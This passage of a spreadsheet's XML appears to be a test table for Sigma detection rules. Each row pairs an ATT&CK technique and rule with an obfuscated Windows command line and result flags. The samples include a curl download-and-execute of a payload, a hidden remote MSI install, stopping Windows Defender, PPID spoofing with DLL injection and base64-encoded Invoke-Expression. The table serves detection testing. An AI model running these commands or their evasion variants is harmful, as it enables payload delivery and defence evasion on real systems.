    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B349" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C349" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D349" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E349" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I349" s="36" t="n"/>
      <c r="J349" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K349" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B350" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C350" s="36" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D350" s="36" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E350" s="36" t="inlineStr">
        <is>
          <t>netsh.exe i""nt portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I350" s="43" t="n"/>
      <c r="J350" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K350" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B351" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C351" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D351" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E351" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K351" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B352" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C352" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D352" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E352" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="43" t="n"/>
      <c r="J352" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K352" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B353" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C353" s="36" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D353" s="36" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E353" s="36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F353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I353" s="36" t="n"/>
      <c r="J353" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K353" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B354" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C354" s="36" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D354" s="36" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E354" s="36" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -"Download""File" -url [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="36" t="n"/>
      <c r="J354" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K354" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B355" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C355" s="36" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D355" s="36" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E355" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "MpCmdRun.exe -Down^loadFile -url [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="43" t="n"/>
      <c r="J355" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K355" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C356" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D356" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E356" s="36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356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="36" t="n"/>
      <c r="J356" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K356" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C357" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D357" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E357" s="36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57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="43" t="n"/>
      <c r="J357" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="n"/>
      <c r="B358" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C358" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D358" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E358" s="4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358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I358" s="43" t="n"/>
      <c r="J358" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K358" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="36" t="n"/>
      <c r="B359" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C359" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D359" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E359" s="4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359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I359" s="43" t="n"/>
      <c r="J359" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K359" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="n"/>
      <c r="B360" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C360" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D360" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E360" s="43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360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="43" t="n"/>
      <c r="J360" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C361" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D361" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E361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61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="43" t="n"/>
      <c r="J361" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C362" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D362" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E362" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="43" t="n"/>
      <c r="J362" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="n"/>
      <c r="B363" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C363" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D363" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E363" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="43" t="n"/>
      <c r="J363" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K363" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C364" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D364" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E364" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="43" t="n"/>
      <c r="J364" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K364" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C365" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D365" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E365" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="43" t="n"/>
      <c r="J365" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C366" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D366" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E366" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="43" t="n"/>
      <c r="J366" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="36" t="n"/>
      <c r="B367" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C367" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D367" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E367" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="43" t="n"/>
      <c r="J367" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="36" t="n"/>
      <c r="B368" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C368" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D368" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E368" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="43" t="n"/>
      <c r="J368" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C369" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D369" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E369" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I369" s="43" t="n"/>
      <c r="J369" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B370" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C370" s="36" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D370" s="36" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E370" s="36" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs  8 /Run</t>
        </is>
      </c>
      <c r="F370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="36" t="n"/>
      <c r="J370" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K370" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B371" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C371" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D371" s="43" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E371" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {. ""C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1""
$ppid=Get-Process explorer | select -expand id
PPID-Spoof -ppid $ppid  -spawnto  ""C:\Program Files\Internet Explorer\iexplore.exe"" -dllpath ""C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll""}</t>
        </is>
      </c>
      <c r="F371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I371" s="43" t="n"/>
      <c r="J371" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K371" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B372" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C372" s="36" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D372" s="36" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E372" s="36" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {. ""C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1""
$ppid=Get-Process explorer | select -expand id
PPID-Spoof -dllpath ""C:\AtomicRedTeam\atomics\T1134.004_x0008_in\calc.dll"" -ppid $ppid -spawnto ""C:\Program Files\Internet Explorer\iexplore.exe""}</t>
        </is>
      </c>
      <c r="F372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I372" s="36" t="n"/>
      <c r="J372" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K372" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C373" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D373" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E373" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I373" s="43" t="n"/>
      <c r="J373" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C374" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D374" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E374" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I374" s="36" t="n"/>
      <c r="J374" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C375" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D375" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E375" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I375" s="43" t="n"/>
      <c r="J375" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C376" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D376" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E376" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I376" s="36" t="n"/>
      <c r="J376" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="43" t="n"/>
      <c r="B377" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C377" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D377" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E377" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
